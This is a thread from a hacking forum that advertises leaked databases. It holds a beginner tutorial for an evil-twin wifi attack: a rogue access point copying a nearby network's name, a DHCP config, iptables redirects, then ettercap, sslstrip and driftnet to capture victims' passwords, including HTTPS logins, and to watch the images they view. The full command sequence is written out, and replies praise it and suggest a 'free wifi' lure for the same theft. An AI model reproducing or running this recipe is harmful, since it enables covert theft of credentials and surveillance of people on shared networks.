Create an account

Very important

• To access the important data of the forums, you must be active in each forum and especially in the leaks and database leaks section, send data and after sending the data and activity, data and important content will be opened and visible for you.
  • You will only see chat messages from people who are at or below your level.
  • More than 500,000 database leaks and millions of account leaks are waiting for you, so access and view with more activity.
  • Many important data are inactive and inaccessible for you, so open them with activity. (This will be done automatically)

Thread Rating:
  • 697 Vote(s) - 3.49 Average
ADVANCED PASSWORD SNIFFING (NOOB FRIENDLY) rogue ap+ettercap+ssl strip+driftnet(no additional router required)

hello friends..this is my first tutorial on advanced password sniffing

this tutorial is based on creating rogue AP(ACCESS POINT)..

NOTE: THIS IS NOT ORDINARY AP SNIFFING .U CAN SNIFF HTTPS PASSWORDS AND ALL KIND OF PASSWORDS. SO FOLLOW THIS TUTORIAL TILL THE END.

SO ...

1) THINGS U NEED

a)ESSID OF ANY NETWORK SURROUNDING YOU ..MAKE SURE MANT USERS CONNECT TO IT..

b) OPERATING SYSTEM :- BT4,UBUNTU.AND OTHER LINUX DISTRIBUTIONS..

c)TWO WORKING NETWORK INTERFACE ,A WIRELESS AND A ETHERNET CONNECTION(WITH INTERNET WOULD BE GREAT)

2) TOOLS REQUIRED

Aircrack-ng

SSLstrip

Ettercap/Ettercap-GTK and Ettercap-Common

and Driftnet ,this is not necessary but would be great if it works properly

3) NOW INSTALLING THESE

open terminal window

sudo apt-get install aircrack-ng

sudo apt-get install driftnet

sudo apt-get install ettercap

or

sudo apt-get install ettercap-gtk(GUI)

for ssl strip ..
do the following

in terminal type:
cd Documents
wget

[To see links please register here]

tar zxvf sslstrip-0.9.tar.gz

cd sslstrip-0.9

sudo python ./setup.py install

that's it...u r done with the installation
now time to configure ur dhcp.conf file ..basically this file contains nameserver and u need to configure it to create new nameserver..

NOW OPEN GEDIT AND PASTE THIS

Quote:ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers [ADD YOUR DNS HERE, REMOVE BRACKETS];
range 192.168.2.130 192.168.2.140;
}

*** ADD YOUR DNS IN THE BRACKET DONT FORGET IT***

save this as dhcp.conf on desktop

now time to sniff :thumbs:

in cmd enter into root mode by typing : sudo su
now

airmon-ng start wlan0
and see the result..note in which mode monitor is enabled..generally its mon0.

To give our AP a name we use Airbase-ng [part of the aircrack-ng suite], we will be making an unsecured AP called 'VOLSBB'. mon0 is my ALFA in monitoring mode and can be substituted for whatever device name you want but it must be a packet injection support device in monitor mode!

airbase-ng -e VOLSBB mon0

So we have a ESSID lets add the netmask and gateway. [at0 is a replicated Ethernet device,,MAY BE URS IS ETH0]:

ifconfig at0 up

ifconfig at0 192.168.2.129 netmask 255.255.255.128

route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129

We need to make sure that connections to the network are assigned IP addresses so we point the dhcpd3 server to our new config file.

mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd

You may get an error saying that dhcpd is not a valid user, go to 'users and groups' on your start menu and add a user group called 'dhcpd' then try.

echo > '/var/lib/dhcp3/dhcpd.leases'
[change /home/semtex-primed/documents/ to the path of your file.]

dhcpd3 -d -f -cf /home/Semtex-Primed/Documents/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0

Now to make sure that the people connecting to the internet while on the network we need to make sure that the server is routed properly when running. They need to be online on our network otherwise were not sniffing any passwords!

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

This part below you need to make sure you have your 2nd interface [none sniffing one] connected to the net and swap 'wlan1' for it below.

iptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADE

iptables --append FORWARD --in-interface at0 -j ACCEPT

Next command needs changing, make sure 192.168.1.254 is changed to the default gateway of the network your using!

iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.254
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

Sniffing!
Now we have a perfectly usable software AP that can connect to the internet. This is a long process to go through but the rewards are huge. We have successfully set the AP up and now just need a way of monitoring it using Ettercap. We will be using Driftnet and SSLstrip too.

Setup IP forwarding:

echo 1 > /proc/sys/net/ipv4/ip_forward

I will assume you have or know how to setup Ettercap. Below will start it monitoring the at0 interface. -T means text interface withing teminal, -q means quiet mode, -p makes sure its not in promiscuous mode and -i tells ettercap which interface to monitor.

ettercap -T -q -p -i at0 // //

Next we will setup SSLstrip, which means if the 'victims' logs into a SSL login page then we will still get the passwords. examples include Paypal, Youtube, Facebook, etc...
Open a new Terminal and type:

sslstrip -a -k -f

Now the cool stuff, Driftnet, this tool will display pictures/video stills of what the person is looking at online! Great little tool!
Open up a 3rd 'sniffing terminal' and type:

driftnet -v -i at0
-v = verbose mode
-i = interface to monitor on.

Congrats!!! u r done all u need is another person connecting to ur AP ..!!!!!:thumbs:

FEEL FREE TO ASK ANYTHING RELATED TO THIS

Very Nice and detailed tutorial. I liked it :thumbs:. But.....

Quote:(06-22-2011, 08:58 AM)papamoney Wrote:

NOTE: THIS IS NOT ORDINARY AP SNIFFING .U CAN SNIFF HTTPS PASSWORDS AND ALL KIND OF PASSWORDS. SO FOLLOW THIS TUTORIAL TILL THE END.

To be honest, this line seems to give a false idea that we cant sniff HTTPS using normal/ordinary AP sniffing. You can easily sniff all the data, https and everything just by connecting to AP and using ettercap with sslstrip.

But wouldnt it be easier and simpler just to use your own normal AP making it unsecured and naming it to "something free wifi etc" and connect to that AP and start sniffing with ettercap with sslstrip? .... easier and shorter way. :biggrin:

Quote:(06-22-2011, 02:10 PM)deathknight Wrote:

Very Nice and detailed tutorial. I liked it :thumbs:. But.....

Quote:(06-22-2011, 08:58 AM)papamoney Wrote:

To be honest, this line seems to give a false idea that we cant sniff HTTPS using normal/ordinary AP sniffing. You can easily sniff all the data, https and everything just by connecting to AP and using ettercap with sslstrip.

But wouldnt it be easier and simpler just to use your own normal AP making it unsecured and naming it to "something free wifi etc" and connect to that AP and start sniffing with ettercap with sslstrip? .... easier and shorter way. :biggrin:
Ya It would be easier but i also kept in mind about the students who use hostel wifi and believe me the students do not connect to unknown wifi ..so this tutorial is mainly for them who have just hostel wifi etc..and no other essid..newaz i made it for understanding purpose there are many ways...i just favour this:p

Awesome, I liked it dude

Quote:(06-22-2011, 07:34 PM)J2ack Wrote:

Awesome, I liked it dude

thnx:smile:..u should atleat try this once...

thanks man, nice post